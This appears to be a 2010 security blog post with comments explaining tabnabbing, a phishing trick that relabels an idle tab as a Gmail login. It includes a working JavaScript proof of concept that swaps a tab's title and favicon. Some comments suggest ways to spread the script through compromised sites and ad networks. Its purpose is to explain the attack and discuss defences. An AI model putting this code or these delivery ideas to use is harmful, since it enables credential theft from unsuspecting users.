Tabnabbing: a new method for phishing
A new phishing method discovered by Aza Raskin, creative lead for Firefox.
http://www.security.nl/artikel/33401/1/Duivelse_nieuwe_phishingaanval_gebruikt_tabs.html
I had to run this through Google's translation service, and it did a decent job, but not a perfect one.
I modified it somewhat based on my understanding of the issue.
There is a good Flash video that shows how the attack works.
Here are the steps as outlined in the translated version of his description.
1. The user navigates to your normal-looking site.
2. The page detects that it has lost focus and has not been interacted with for a while.
3. It then replaces the favicon on the tab with the Google favicon, the title with "Gmail: Email from Google", and the page content with a Gmail login look-alike. This can all be done instantly with a little bit of JavaScript.
4. The user scans their many open tabs. The favicon and title act as a strong visual cue, memory is malleable, and the user will simply assume they left a Gmail tab open. When they click back to the fake Gmail tab, they see the standard Gmail login page, assume they have been logged out, and enter their credentials to log in. The attack preys on the perceived immutability of tabs.
5. After the user has entered their login information and it has been sent to your server, the phishing site redirects them to the real Gmail. If they had left a Gmail tab open where they had previously authenticated, they were never logged out in the first place, so it will appear as if the login was successful.
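The steps above as a working proof of concept, added here as an example; this is not the code from Aza Raskin's post or from the security.nl article. The idle threshold, the decoy title and favicon URL, the sample page title, and the stub document and clock used to run it offline under Node are all assumptions; in a browser the same functions are wired to the window's blur and focus events as shown in the comment at the end.

```javascript
// Added example: tabnabbing proof of concept following steps 2, 3 and 5 above.
// Not the original post's code; the threshold, decoy and stubs are assumptions.

const IDLE_MS = 5000; // assumed: how long the tab must sit unfocused before swapping
const DECOY = {       // assumed decoy identity for step 3
  title: "Gmail: Email from Google",
  favicon: "https://mail.google.com/favicon.ico",
};

// Current favicon href, or null if the page declares none.
function currentFavicon(doc) {
  const link = doc.querySelector('link[rel~="icon"]');
  return link ? link.href : null;
}

// Step 3: swap the tab's visible identity. The <link rel="icon"> is replaced rather
// than edited in place because browsers reliably re-fetch the icon for a new element.
// Returns the original identity so a caller could restore it.
function swapTabIdentity(doc, decoy) {
  const original = { title: doc.title, favicon: currentFavicon(doc) };
  doc.title = decoy.title;
  const old = doc.querySelector('link[rel~="icon"]');
  if (old) old.remove();
  const link = doc.createElement("link");
  link.rel = "icon";
  link.href = decoy.favicon;
  doc.head.appendChild(link);
  return original;
}

// Step 2: arm a timer when the page loses focus, cancel it if focus returns early,
// and swap only once the idle threshold has passed. Timer functions are injected so
// the logic can be driven deterministically offline.
function createTabnabber(doc, decoy, idleMs, timers) {
  let pending = null;
  let swapped = false;
  const fire = () => {
    pending = null;
    if (!swapped) {
      swapTabIdentity(doc, decoy);
      swapped = true;
    }
  };
  return {
    onBlur() {  // user switched to another tab or window
      if (!swapped && pending === null) pending = timers.set(fire, idleMs);
    },
    onFocus() { // user came back before the threshold: do nothing
      if (pending !== null) { timers.clear(pending); pending = null; }
    },
    isSwapped: () => swapped,
  };
}

// ---- offline stubs (constructed for this example, not part of the attack) ----
function makeFakeDocument(title, favicon) {
  const head = { children: [], appendChild(el) { head.children.push(el); } };
  const element = (rel, href) => ({
    rel, href,
    remove() { head.children = head.children.filter((e) => e !== this); },
  });
  head.appendChild(element("icon", favicon));
  return {
    title,
    head,
    createElement: () => element("", ""),
    // Only the one selector the attack code uses is supported.
    querySelector: (sel) =>
      sel === 'link[rel~="icon"]' ? head.children.find((e) => e.rel === "icon") || null : null,
  };
}

function makeFakeClock() {
  let now = 0, nextId = 1;
  const pending = new Map();
  return {
    set(fn, ms) { const id = nextId++; pending.set(id, { at: now + ms, fn }); return id; },
    clear(id) { pending.delete(id); },
    advance(ms) {
      now += ms;
      for (const [id, t] of [...pending]) if (t.at <= now) { pending.delete(id); t.fn(); }
    },
  };
}

// Two scenarios: the user returns early (nothing changes) and the tab sits idle
// past the threshold (identity swapped). Returns what each tab looks like afterwards.
function runScenarios() {
  const early = makeFakeDocument("Cute kittens", "https://example.test/kitten.ico");
  const earlyClock = makeFakeClock();
  const nab1 = createTabnabber(early, DECOY, IDLE_MS, earlyClock);
  nab1.onBlur();
  earlyClock.advance(IDLE_MS - 1000);
  nab1.onFocus();                 // back before the threshold: timer cancelled
  earlyClock.advance(IDLE_MS * 2);

  const idle = makeFakeDocument("Cute kittens", "https://example.test/kitten.ico");
  const idleClock = makeFakeClock();
  const nab2 = createTabnabber(idle, DECOY, IDLE_MS, idleClock);
  nab2.onBlur();
  idleClock.advance(IDLE_MS);     // threshold reached: swap fires

  return {
    earlyReturn: { title: early.title, favicon: currentFavicon(early), swapped: nab1.isSwapped() },
    idle: { title: idle.title, favicon: currentFavicon(idle), swapped: nab2.isSwapped() },
  };
}

console.log(runScenarios());

// In a browser the wiring would be (assumed):
//   const nab = createTabnabber(document, DECOY, IDLE_MS,
//     { set: (fn, ms) => setTimeout(fn, ms), clear: (id) => clearTimeout(id) });
//   window.addEventListener("blur", nab.onBlur);
//   window.addEventListener("focus", nab.onFocus);
```

The piece this leaves out is the one thing the user can still check: the address bar. Swapping the title, favicon and body never changes the URL shown for the tab, which is why the comments below point at it as the giveaway.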
Comments
Not only that... I am pretty sure I am going to notice if one of my tab favicons changes suddenly while I'm sitting there.
Now, if I have walked away from my PC... that's a possibility, I guess...
Am I just missing something that would make this seem more prolific than it appears it would be?
Husaragi
May 25th 2010
Add some automation, like using the referring URL or the search term used to reach the website, and you already have a clue what can be 'tab-jacked'.
Email accounts would probably be the most successful ones.
A.Champ
May 25th 2010
However, instead of translating the page, you can read a similar English writeup at "the H" here:
http://www.h-online.com/open/news/item/New-phishing-attack-exploits-tabbed-browsing-1006386.html
(and in German here: http://www.heise.de/security/meldung/Phishing-per-Browser-Tabs-1006281.html)
Note that all pages refer to the following (English) blog page: http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
Bitwiper
May 25th 2010
I see this happening: set up some innocent-looking page, make sure it loads really slowly (or better, fake it with JavaScript to be sure), and then put the attack on that.
However, the URL shown isn't changed, so that gives it away easily. Still, they only have to get a few users to make it worth their time if the target site has enough value per account.
Defenses... why does JavaScript need to be allowed to change the favicon?
Arnt
May 25th 2010
Injecting JS into vulnerable forums/websites related to a specific subject, without defacing them or hindering the users' ability to use them, to stay under the radar.
Example: adding the JS sample to a website related to a game, then faking that game's official page or forum with the JS when the user has tabbed elsewhere. Even better, simply push the JS script as ads into an ad network and 'aim' at a specific website category.
On the corporate side, it could even be used when a partner or official website gets injected/compromised. Even if that website doesn't require credentials, if the JS fakes some internal web-based tools, the success rate might be interesting for the bad guys.
A.Champ
May 26th 2010